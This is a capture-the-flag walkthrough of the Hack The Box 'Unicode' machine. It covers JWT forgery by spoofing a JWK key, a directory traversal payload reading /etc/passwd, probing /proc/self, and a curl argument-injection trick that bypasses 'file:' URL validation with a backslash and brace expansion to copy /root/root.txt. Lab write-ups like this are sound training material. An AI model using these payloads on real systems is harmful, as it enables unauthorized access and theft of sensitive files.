Hack the Box : Unicode

Hack The Box
2022.08.16

JWK Spoofing, Directory traversal, Unicode normalization, Use /proc to gather info…

Many elements. Much fun.

It took me 2 days to find flags.

I used dirb for the first time. Pre-installed with Kali linux.

Because somehow gobuster kept returning error.

dirb http://10.10.11.126
gobuster dir --url http://10.10.11.126 --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

01:08 JWT token found

JWT token start with ey and has 3 parts.

JWT.IO
JSON Web Tokens are an open, industry standard RFC 7519 method for representing claims securely between two parties.
jwt.io

https://github.com/ticarpi/jwt_tool is also available.

03:51 Prepare json file with new key 

ssh-keygen -f unicode.key
sudo openssl rsa -text -noout -in unicode.key -modulus
xxd
 make a hexdump or do the reverse.
-r reverse operation: convert (or patch) hexdump into binary. 
-p output in postscript continuous hexdump style. Also known as plain hexdump style.

hexdump into binary then base64 in one line

echo -n **** | xxd -r -p | base64 -w 0

**** is the modulu of RSA public key.

json file here

{
    "keys": [
        {
            "kty": "RSA",
            "use": "sig",
            "kid": "hackthebox",
            "alg": "RS256",
            "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
            "e": "AQAB"
        }
    ]
}
nThe modulus for the RSA public key. Base64urlUInt-encoded value
eThe exponent for the RSA public key. Base64urlUInt-encoded value

e is usually 65537 = A Q A B.

Why “65537 = A Q A B”?

65537 is 0000 0001: 0000 0000 : 0000 0001

When you shift it to 6 bits for base64, you get

000000 010000 000000 000001

That is A Q A B.

So in this Box, we do not need to modify e as newly created public key says “publicExponent: 65537 (0x10001)” and it’s AQAB in json file.

CyberChef
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
gchq.github.io

05:21 Directory traversal vulnerability 

/../../../../../../../etc/passwd

05:35 Unicode issue

https://book.hacktricks.xyz/pentesting-web/unicode-normalization-vulnerability
book.hacktricks.xyz

05:46 /proc investigation

Page Not Found | MIT - Massachusetts Institute of Technology
web.mit.edu

/proc gives you fun info about server & users.

/proc/self/
cmdline — Contains the command issued when starting the process.
cwd — A symbolic link to the current working directory for the process.
environ — A list of the environment variables for the process. The environment variable is given in all upper-case characters, and the value is in lower-case characters.
exe — A symbolic link to the executable of this process.

06:29 Privilege escalation

curl

file: which names files in the file system. The path portion of a file: URL consists of three parts:

a double slash (//)
the name of the system on which the file system is located, followed by a path separator character

root flag is usually at /root/root.txt

Below gets Invalid url error

file:/root/root.txt
file:///root/root.txt

“file” part may be causing a validate error, so added \ somewhere in “file”.

It worked.

However, but no location info on downloaded file.

fi\le:/root/root.txt

f\ile:/root/root.txt

Now we need to specify where to DL.

However space was not accepted as below.

f\ile:/root/root.txt -o /tmp/root.txt

So wrap everything in {}. Then , is recognized as space.

{f\ile:/root/root.txt,-o,/tmp/root.txt}

example

echo {this,is,love}
this is love